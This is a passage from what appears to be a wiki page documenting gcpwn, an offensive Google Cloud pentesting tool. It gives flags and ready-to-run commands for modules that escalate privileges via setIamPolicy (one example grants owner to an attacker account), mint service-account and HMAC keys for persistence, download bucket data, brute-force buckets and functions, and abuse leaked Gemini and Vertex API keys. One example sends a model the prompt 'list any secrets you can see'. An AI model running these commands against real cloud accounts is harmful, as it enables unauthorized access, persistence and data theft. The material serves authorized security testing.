  • Key Flags: mode --create/--enable/--disable (mutually exclusive; prompts if omitted); --sa <projects/<pid>/serviceAccounts/<email>> (target SA, else prompts from cache); --sa-key <name> (key to enable/disable); --assume (assume created key credentials); -v/--debug. Run modules run exploit_service_account_keys -h for full options.
  • Example:
    modules run exploit_service_account_keys --create --sa projects/proj1/serviceAccounts/app@proj1.iam.gserviceaccount.com --assume
    gcpwn --module exploit_service_account_keys --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --create --sa projects/proj1/serviceAccounts/app@proj1.iam.gserviceaccount.com --assume

exploit_gcp_setiampolicy

  • Service Group: Everything
  • What It Does: Unified setIamPolicy exploit that adds a chosen principal at a chosen role to the IAM policy of a target resource (org/folder/project, bucket, function, instance, secret, Cloud Run, Artifact Registry, KMS, Pub/Sub, Service Directory, Cloud Tasks). The core privilege-escalation primitive for granting yourself or a controlled SA elevated access.
  • Key Flags: --service <type> (resource type; interactive prompt if omitted), --resource <full-name> or service-specific name flags (e.g. --bucket, --function-name, --instance-name, --secret-name, --cloudrun-service-name, --kms-key-name, --topic-name), --member user:<email>|serviceAccount:<email>, --role roles/<x> or --default-role, --overwrite (dangerous: may replace whole policy), -v/--debug. Run modules run exploit_gcp_setiampolicy -h for full options.
  • Example:
    modules run exploit_gcp_setiampolicy --service project --resource projects/12345 --member user:attacker@example.com --role roles/owner
    gcpwn --module exploit_gcp_setiampolicy --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --service bucket --bucket target-bucket --member serviceAccount:sa1@proj.iam.gserviceaccount.com --default-role

exploit_storage_hmac

  • Service Group: Cloud Storage
  • What It Does: Mints an HMAC key tied to a service account (long-lived S3-style credentials for persistence), then uses it to enumerate/download bucket data through the S3-compatible XML API; can also reuse or toggle the state of an existing HMAC key.
  • Key Flags: --buckets / --blobs (enumerate buckets/objects over the XML API), --access-id + --hmac-secret (operate with an existing HMAC key), --download (pull object bytes to loot), -v/--debug. Run modules run exploit_storage_hmac -h for full options.
  • Example:
    modules run exploit_storage_hmac --buckets --blobs --download
    gcpwn --module exploit_storage_hmac --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --buckets --blobs --download

Process Modules

analyze_vulns

  • Service Group: Everything
  • What It Does: Placeholder module intended to analyze vulnerabilities from processed IAM bindings; currently a stub that prints "coming soon" and performs no analysis. All flags are reserved for future use.
  • Key Flags: -v/--debug, --txt, --csv, --silent, --output (all reserved/no-op today). Run modules run analyze_vulns -h for full options.
  • Example:
    modules run analyze_vulns
    gcpwn --module analyze_vulns --workspace WORKSPACE_NAME --cred CRED_NAME --current-project

process_gcp_iam_bindings

  • Service Group: Everything
  • What It Does: Reports the consolidated per-member (inverted) IAM view — every principal and the roles/assets they hold — from already-enumerated bindings, optionally re-materializing/refreshing them first. Used to review effective access and surface over-privileged principals for attack-path planning.
  • Key Flags: --force-refresh-bindings (re-enumerate IAM bindings before reporting), output selectors --txt/--csv/--silent/--output <dir>, -v/--debug. Run modules run process_gcp_iam_bindings -h for full options.
  • Example:
    modules run process_gcp_iam_bindings --force-refresh-bindings --output ./iam_report
    gcpwn --module process_gcp_iam_bindings --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --force-refresh-bindings --output ./iam_report

Unauthenticated Modules

unauth_apikey_enum_all_scopes

  • Service Group: API Keys
  • What It Does: Unauthenticated scanner (ported from ozguralp/gmapsapiscanner) that probes ~40 Google Maps/Places/Roads/Routes plus Gemini Files/Cached-Contents and Vertex CountTokens REST endpoints with a supplied API key to determine which paid/data-leak scopes it can reach; caches results per workspace and surfaces the project number leaked in error responses.
  • Key Flags: --api-key/-a (key to test; prompts if omitted), --proxy/-p (HTTP/HTTPS/SOCKS proxy URL), --insecure (disable TLS verification for intercepting proxies like Burp), -v/--debug. Run modules run unauth_apikey_enum_all_scopes -h for full options.
  • Example:
    gcpwn --module unauth_apikey_enum_all_scopes --api-key AIzaSyExampleKey1234567890 --proxy http://127.0.0.1:8080 --insecure

unauth_apikey_gemini_exploit

  • Service Group: API Keys
  • What It Does: Unauthenticated post-exploitation of an exposed Gemini (generativelanguage) API key: lists (and optionally downloads) uploaded Files and Cached Contents, exercises countTokens/embedContent, discovers live models via models.list, and can send a prompt through generate_content; can auto-select a previously-captured Gemini-capable key from the workspace.
  • Key Flags: --api-key/-a (prompts / picks a cached vulnerable key if omitted), --question + --question-model (send a generate_content prompt), --token-model / --embedding-model / --sample-text, --model-scan-mode {single,all}, --page-size, --insecure, -v/--debug (file/cache downloads are offered interactively). Run modules run unauth_apikey_gemini_exploit -h for full options.
  • Example:
    gcpwn --module unauth_apikey_gemini_exploit --api-key AIzaSyExampleKey1234567890 --question "list any secrets you can see" --model-scan-mode all

unauth_apikey_vertex_exploit

  • Service Group: API Keys
  • What It Does: Unauthenticated abuse of an exposed Vertex AI express-mode API key: discovers working publisher models on aiplatform.googleapis.com and drops into an interactive query shell to submit prompts against Google publisher models; can auto-select a previously-captured Vertex-capable key from the workspace.
  • Key Flags: --api-key/-a (prompts / picks a cached vulnerable key if omitted), --model/-m (specific publisher model), --model-discovery-mode {first,all} (first = first working model from the bundled list; all = probe full list then choose), --insecure, -v/--debug. Run modules run unauth_apikey_vertex_exploit -h for full options.
  • Example:
    gcpwn --module unauth_apikey_vertex_exploit --api-key AIzaSyExampleKey1234567890 --model-discovery-mode all

unauth_bucketbrute

  • Service Group: Cloud Storage
  • What It Does: A port of Rhino Security Labs' GCPBucketBrute: brute-forces Cloud Storage bucket names from a keyword/wordlist and checks each candidate for anonymous (unauthenticated) access and permission misconfigurations — no credentials required.
  • Key Flags: --keyword/-k and --wordlist/-w (candidate source), --check / --check-list (anonymous permission checks), --authenticated (add authenticated checks), --subprocesses/-s and --throttle (concurrency/rate), --out-file/-o and --all-tlds (output / candidate expansion), -v/--debug. Run modules run unauth_bucketbrute -h for full options.
  • Example:
    gcpwn --module unauth_bucketbrute --keyword acme --check --subprocesses 10

unauth_functionbrute

  • Service Group: Cloud Functions
  • What It Does: Unauthenticated brute-force of Cloud Functions HTTPS endpoints (https://<region>-<project>.cloudfunctions.net/...) across known v1/v2 regions and a name permutation wordlist, checking each for anonymous/external reachability. Finds publicly invokable functions with no credentials.
  • Key Flags: --region <region> (limit to one region, else all known); target selection --check <name> (repeatable) | --check-list <file> | -w/--wordlist <file>; -s/--subprocesses N (default 5); -v/--debug. Run modules run unauth_functionbrute -h for full options.
  • Example:
    gcpwn --module unauth_functionbrute --region us-central1 -w wordlist.txt -s 10

Typical Run Flow

modules run enum_all --iam
modules run enum_gcp_policy_bindings --ensure-tree
modules run process_gcp_iam_bindings
modules run process_og_gcpwn_data --expand-inherited --reset --out ./gcpwn_output/opengraph

Clone this wiki locally